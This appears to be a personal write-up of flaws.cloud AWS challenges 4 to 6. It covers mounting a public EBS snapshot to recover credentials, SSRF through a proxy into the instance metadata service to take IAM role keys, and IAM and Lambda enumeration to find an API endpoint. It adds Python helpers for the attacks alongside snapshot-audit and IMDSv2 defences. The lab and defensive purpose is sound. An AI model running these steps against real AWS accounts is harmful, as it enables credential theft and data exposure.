AWS Security (S3 buckets, EC2 snapshots, leaked AWS keys, permissions to read IAM policies)

flaws.cloud challenge

http://flaws.cloud/

Challenge 4:

URL: http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/

  • The page asks for HTTP basic-auth credentials that we don't have.
  • The description says a snapshot of this instance was taken after it was deployed.
  • Goal: get into this EC2 instance (or at least onto its disk).
  1. Snapshots: we are told a snapshot of the instance exists. An EBS snapshot can be shared publicly (createVolumePermission granted to the "all" group), and anyone who finds a public snapshot can create a volume from it in their own account and read every file that was on the disk at the time it was taken. That is the risk here.
Without knowing the owner, all we can do is filter the (very long) list of public snapshots in the region by size, status and tier; this is run with our own account's profile ("terraform"):
aws --profile terraform ec2 describe-snapshots --region us-west-2 --filters "Name=volume-size,Values=8" "Name=status,Values=completed" "Name=storage-tier,Values=standard" > us-west-2_8GiB_standardtier.txt
Better: the keys from the previous level belong to the flaws account, so get-caller-identity gives us the account ID to search for (975426262029):
aws --profile flaws sts get-caller-identity
Now list only the snapshots owned by that account that our account can see (the documented option is --owner-ids):
aws --profile terraform ec2 describe-snapshots --owner-ids 975426262029 --region us-west-2
Create a volume from the public snapshot in our own account, in the same availability zone as an EC2 instance we control:
aws --profile terraform ec2 create-volume --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89 --availability-zone us-west-2c
Attach the new volume to that instance (aws ec2 attach-volume with your own volume ID, instance ID and a device name such as /dev/sdf); on the instance it shows up as /dev/xvdf, with the root filesystem on its first partition:
fdisk -l
/dev/xvdf
lsblk -f
mkdir /mnt/volume_ext
mount -t ext4 /dev/xvdf1 /mnt/volume_ext
Searching the mounted filesystem turns up the basic-auth username and password for the site:
flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
which the browser sends as base64("flaws:nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M"):
Authorization: Basic Zmxhd3M6bkNQOHhpZ2RqcGp5aVhnSjduSnU3cnc1Um82OGlFOE0=
Logging in reveals the URL of the next level:
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/example.com/
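The two sides of the snapshot problem above, as an added example (this is not code from the flaws.cloud write-up): public_snapshots_of is the attacker's query from the challenge (the same thing as describe-snapshots with --owner-ids and --restorable-by-user-ids all), audit_my_snapshots is the check a defender should run against their own account, and make_private is the fix. All three take a boto3-style EC2 client; for real use pass boto3.client("ec2", region_name="us-west-2"). FakeEC2 is a constructed stand-in with made-up snapshot and account IDs so the script runs offline.

```python
"""Public EBS snapshots, seen from both sides.

Added example; not code from the flaws.cloud write-up. The functions take a
boto3-style EC2 client (pass boto3.client("ec2", region_name=...) for real);
FakeEC2 is a constructed stand-in with made-up IDs so this runs offline.
"""


class FakeEC2:
    """Constructed stand-in for boto3's EC2 client; every ID here is made up."""
    account = "111111111111"

    def __init__(self):
        # snapshot id -> (owner account, createVolumePermission entries)
        self.snapshots = {
            "snap-0aaa111": (self.account, [{"Group": "all"}]),            # public
            "snap-0bbb222": (self.account, [{"UserId": "222222222222"}]),  # shared with one account
            "snap-0ccc333": (self.account, []),                             # private
            "snap-0ddd444": ("333333333333", [{"Group": "all"}]),           # someone else's public snapshot
        }

    def describe_snapshots(self, OwnerIds=(), RestorableByUserIds=(), NextToken=None):
        owners = [self.account if o == "self" else o for o in OwnerIds]
        page = [
            {"SnapshotId": sid, "OwnerId": owner, "VolumeSize": 8}
            for sid, (owner, perms) in self.snapshots.items()
            if (not owners or owner in owners)
            and ("all" not in RestorableByUserIds or {"Group": "all"} in perms)
        ]
        return {"Snapshots": page}  # a single page, so no NextToken

    def describe_snapshot_attribute(self, SnapshotId, Attribute):
        return {"SnapshotId": SnapshotId,
                "CreateVolumePermissions": list(self.snapshots[SnapshotId][1])}

    def modify_snapshot_attribute(self, SnapshotId, Attribute, OperationType, GroupNames):
        perms = self.snapshots[SnapshotId][1]
        if OperationType == "remove":
            perms[:] = [p for p in perms if p.get("Group") not in GroupNames]
        return {}


def _all_snapshots(ec2, **kwargs):
    """Follow NextToken until describe_snapshots runs out of pages."""
    while True:
        page = ec2.describe_snapshots(**kwargs)
        yield from page["Snapshots"]
        token = page.get("NextToken")
        if not token:
            return
        kwargs["NextToken"] = token


def public_snapshots_of(ec2, owner_id):
    """Attacker view: snapshots that owner_id has shared with everyone.

    RestorableByUserIds=["all"] limits the result to public snapshots; it is the
    same query as `describe-snapshots --owner-ids <id> --restorable-by-user-ids all`.
    """
    return [s["SnapshotId"]
            for s in _all_snapshots(ec2, OwnerIds=[owner_id], RestorableByUserIds=["all"])]


def audit_my_snapshots(ec2):
    """Defender view: who can create volumes from each snapshot this account owns."""
    report = {"public": [], "shared": [], "private": []}
    for snap in _all_snapshots(ec2, OwnerIds=["self"]):
        perms = ec2.describe_snapshot_attribute(
            SnapshotId=snap["SnapshotId"], Attribute="createVolumePermission"
        )["CreateVolumePermissions"]
        if any(p.get("Group") == "all" for p in perms):
            report["public"].append(snap["SnapshotId"])
        elif perms:
            report["shared"].append(snap["SnapshotId"])
        else:
            report["private"].append(snap["SnapshotId"])
    return report


def make_private(ec2, snapshot_id):
    """Remediation: revoke the 'all' group's createVolumePermission on one snapshot."""
    ec2.modify_snapshot_attribute(
        SnapshotId=snapshot_id, Attribute="createVolumePermission",
        OperationType="remove", GroupNames=["all"],
    )


if __name__ == "__main__":
    ec2 = FakeEC2()
    print("public snapshots of", FakeEC2.account, public_snapshots_of(ec2, FakeEC2.account))
    print("audit:", audit_my_snapshots(ec2))
    for sid in audit_my_snapshots(ec2)["public"]:
        make_private(ec2, sid)
    print("after remediation:", audit_my_snapshots(ec2))
```

The attacker side only needs the target's account ID, which is exactly why sts get-caller-identity on any leaked key from the target is the first thing to run. The audit deliberately asks describe_snapshot_attribute per snapshot rather than trusting the describe-snapshots filter, because that attribute is the authoritative record of who can create volumes from it.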

Challenge 5:

We are given an HTTP proxy running on an EC2 instance: whatever host and path we put after /proxy/ is fetched by the instance and the response is returned to us.

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/<your website>/
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/example.com/
Because the request originates on the instance, the proxy can reach the instance metadata service, which is link-local and only answers to the instance itself. That makes this an SSRF into IMDS:
http://169.254.169.254/latest/meta-data/
The temporary credentials of the instance's IAM role are under /latest/meta-data/iam/security-credentials/<role-name> (the directory listing gives the role name). The response contains an AccessKeyId, a SecretAccessKey and a Token:
"AccessKeyId" : "ASIA6GG7PSQGYRUEDGDO",
"SecretAccessKey" : "oqzfuYcxUnzlDPiIU/LLrlvOUYseSzZCShqgLHK3",
A key starting with ASIA is a temporary credential: it only works together with the Token from the same response (aws_session_token in the profile), and it expires, so fetch it again when it stops working. With a profile built from these three values, the role can list the level 6 bucket:
aws --profile flaws_lvl5 s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
The listing shows a directory that is not linked from the site, and it can be fetched through the proxy (or directly in a browser):
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/
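The SSRF-to-credentials step above, as an added example (this is not code from the flaws.cloud write-up). It builds the proxy URLs for the IMDS paths, turns the credential document into a credentials-file profile that includes the session token the notes above leave out, and checks how long the credentials have left. Assumed: the proxy accepts "<host>/<path>" after /proxy/ exactly as the URLs above show, and IMDS returns the documented credential document. SAMPLE_IMDS is a constructed response with placeholder values, not real keys.

```python
"""Turn the proxy's SSRF into usable AWS credentials and sanity-check them.

Added example; not code from the flaws.cloud write-up. Assumed: the proxy takes
"<host>/<path>" after /proxy/ as the write-up's URLs show, and IMDS answers
with the documented credential document. SAMPLE_IMDS is a constructed response
with placeholder values, not real keys.
"""
import json
from datetime import datetime, timezone

PROXY = "http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/"
IMDS = "169.254.169.254"

# Constructed sample of GET /latest/meta-data/iam/security-credentials/<role-name>
SAMPLE_IMDS = json.dumps({
    "Code": "Success",
    "LastUpdated": "2024-01-01T00:00:00Z",
    "Type": "AWS-HMAC",
    "AccessKeyId": "ASIAXXXXXXXXXXXXXXXX",
    "SecretAccessKey": "constructed/secret/value",
    "Token": "constructed-session-token",
    "Expiration": "2024-01-01T06:00:00Z",
})


def via_proxy(path, host=IMDS):
    """URL that makes the instance fetch `path` from `host` for us (the SSRF)."""
    return f"{PROXY}{host}/{path.lstrip('/')}"


def role_list_url():
    """Lists the instance's role name(s); fetch this first to learn <role-name>."""
    return via_proxy("latest/meta-data/iam/security-credentials/")


def role_credentials_url(role_name):
    return via_proxy(f"latest/meta-data/iam/security-credentials/{role_name}")


def to_profile(imds_json, profile):
    """Render the IMDS credential document as an ~/.aws/credentials section.

    Keys starting with ASIA are temporary: without the Token from the same
    response (aws_session_token) the API rejects every request signed with them.
    """
    doc = json.loads(imds_json)
    if doc.get("Code") != "Success":
        raise ValueError(f"IMDS returned Code={doc.get('Code')!r}")
    lines = [f"[{profile}]",
             f"aws_access_key_id = {doc['AccessKeyId']}",
             f"aws_secret_access_key = {doc['SecretAccessKey']}"]
    if doc["AccessKeyId"].startswith("ASIA"):
        if not doc.get("Token"):
            raise ValueError("temporary (ASIA) key without its session token is unusable")
        lines.append(f"aws_session_token = {doc['Token']}")
    return "\n".join(lines) + "\n"


def _ts(s):
    """Parse an IMDS timestamp such as 2024-01-01T06:00:00Z as UTC."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def seconds_left(imds_json, now=None):
    """Seconds until the credentials expire (negative means fetch them again).

    `now` is an IMDS-style timestamp string, or None for the current time.
    """
    expiration = _ts(json.loads(imds_json)["Expiration"])
    current = _ts(now) if now else datetime.now(timezone.utc)
    return (expiration - current).total_seconds()


if __name__ == "__main__":
    print(role_list_url())
    print(to_profile(SAMPLE_IMDS, "flaws_lvl5"))
    print("seconds left:", seconds_left(SAMPLE_IMDS, "2024-01-01T05:00:00Z"))
```

The fix on the instance side is to require IMDSv2 (aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required): IMDSv2 only answers GETs that carry a session token obtained with a PUT request, and a proxy that forwards plain GETs cannot issue that PUT, so the credential path returns 401 instead of keys.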

Challenge 6:

We are given AWS credentials for an IAM user and told that the SecurityAudit managed policy is attached to it. SecurityAudit is read-only, but it can read IAM, Lambda and API Gateway configuration, which is enough to map out what else the account exposes.

Start with who we are and which policies the user has:
aws --profile flaws_lvl6 iam get-user
aws --profile flaws_lvl6 sts get-caller-identity
aws --profile flaws_lvl6 iam list-attached-user-policies --user-name Level6
Besides SecurityAudit there is a customer-managed policy called list_apigateways. get-policy only shows metadata (including the default version ID); get-policy-version shows the actual document, which is what tells us what it allows (as the name suggests, read access to API Gateway, which get-stages below depends on):
aws --profile flaws_lvl6 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
aws --profile flaws_lvl6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
SecurityAudit lets us enumerate Lambda functions; there is one called Level6:
aws --region us-west-2 --profile flaws_lvl6 lambda list-functions
A Lambda behind API Gateway is invoked through a URL of the form
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
so we need three things:
  • restapi_id
  • region (we already know it: us-west-2)
  • stage_name
The function's resource policy says who may invoke it. For an API Gateway trigger the condition's SourceArn is the execute-api ARN of the API, and the resource part of that ARN starts with the REST API ID:
aws --region us-west-2 --profile flaws_lvl6 lambda get-policy --function-name Level6
  • restapi_id: s33ppypa75
The list_apigateways policy lets us read the API's stages:
aws --profile flaws_lvl6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
  • stage_name: Prod
Putting it together:
https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/
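The ARN-to-URL step above, as an added example (this is not code from the flaws.cloud write-up): it parses the Policy field that lambda get-policy returns (a JSON document serialised inside the JSON response), pulls every execute-api SourceArn out of the allow statements, and assembles the invoke URL once the stage is known. SAMPLE_GET_POLICY is a constructed response that reuses the API ID, account ID and function name from the notes above; the statement ID, RevisionId and the resource path /level6 are assumptions.

```python
"""Derive an API Gateway invoke URL from a Lambda function's resource policy.

Added example; not code from the flaws.cloud write-up. `lambda get-policy`
returns the policy as a JSON string in the "Policy" field, and an API Gateway
trigger shows up as a SourceArn of the form
arn:aws:execute-api:<region>:<account>:<api-id>/<stage>/<METHOD>/<path>.
SAMPLE_GET_POLICY is constructed: API ID, account and function name come from
the write-up; Sid, RevisionId and the /level6 path are assumed.
"""
import json
import re

EXECUTE_API_ARN = re.compile(
    r"^arn:aws:execute-api:(?P<region>[^:]+):(?P<account>\d*):"
    r"(?P<api_id>[^/]+)/(?P<stage>[^/]+)/(?P<method>[^/]+)(?P<path>/.*)?$"
)

SAMPLE_GET_POLICY = {
    "Policy": json.dumps({
        "Version": "2012-10-17",
        "Id": "default",
        "Statement": [{
            "Sid": "assumed-statement-id",
            "Effect": "Allow",
            "Principal": {"Service": "apigateway.amazonaws.com"},
            "Action": "lambda:InvokeFunction",
            "Resource": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
            "Condition": {"ArnLike": {
                "AWS:SourceArn": "arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6"
            }},
        }],
    }),
    "RevisionId": "00000000-0000-0000-0000-000000000000",
}


def parse_execute_api_arn(arn):
    """Split an execute-api ARN into its parts, or return None for any other ARN."""
    m = EXECUTE_API_ARN.match(arn)
    if not m:
        return None
    parts = m.groupdict()
    parts["path"] = parts["path"] or "/"
    return parts


def api_targets_from_policy(get_policy_response):
    """Every execute-api SourceArn that an Allow statement lets invoke the function."""
    policy = json.loads(get_policy_response["Policy"])
    targets = []
    for statement in policy.get("Statement", []):
        if statement.get("Effect") != "Allow":
            continue
        for operator, keys in statement.get("Condition", {}).items():
            if operator not in ("ArnLike", "ArnEquals", "StringLike", "StringEquals"):
                continue
            for key, value in keys.items():
                if key.lower() != "aws:sourcearn":
                    continue
                for arn in (value if isinstance(value, list) else [value]):
                    parsed = parse_execute_api_arn(arn)
                    if parsed:
                        targets.append(parsed)
    return targets


def invoke_url(target, stage=None):
    """Public URL for a parsed target. The ARN usually has '*' for the stage, in
    which case the real name has to come from `apigateway get-stages`."""
    stage = stage or (target["stage"] if target["stage"] != "*" else None)
    if not stage:
        raise ValueError("stage is a wildcard in the ARN; look it up with apigateway get-stages")
    return (f"https://{target['api_id']}.execute-api.{target['region']}.amazonaws.com"
            f"/{stage}{target['path']}")


if __name__ == "__main__":
    for t in api_targets_from_policy(SAMPLE_GET_POLICY):
        print(t["method"], invoke_url(t, stage="Prod"))
```

The policy also reveals the HTTP method and resource path the gateway is allowed to forward, so the parsed target tells you not just which API to hit but what request to make; the stage is the one field the resource policy normally leaves as a wildcard, which is why the separate apigateway permission matters in this level.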

n00🔑

Tries to understand computers. I know a little bit of most things. Definitely not an expert. Usually plays HTB (ID-23862). https://www.linkedin.com/in/pswalia2u/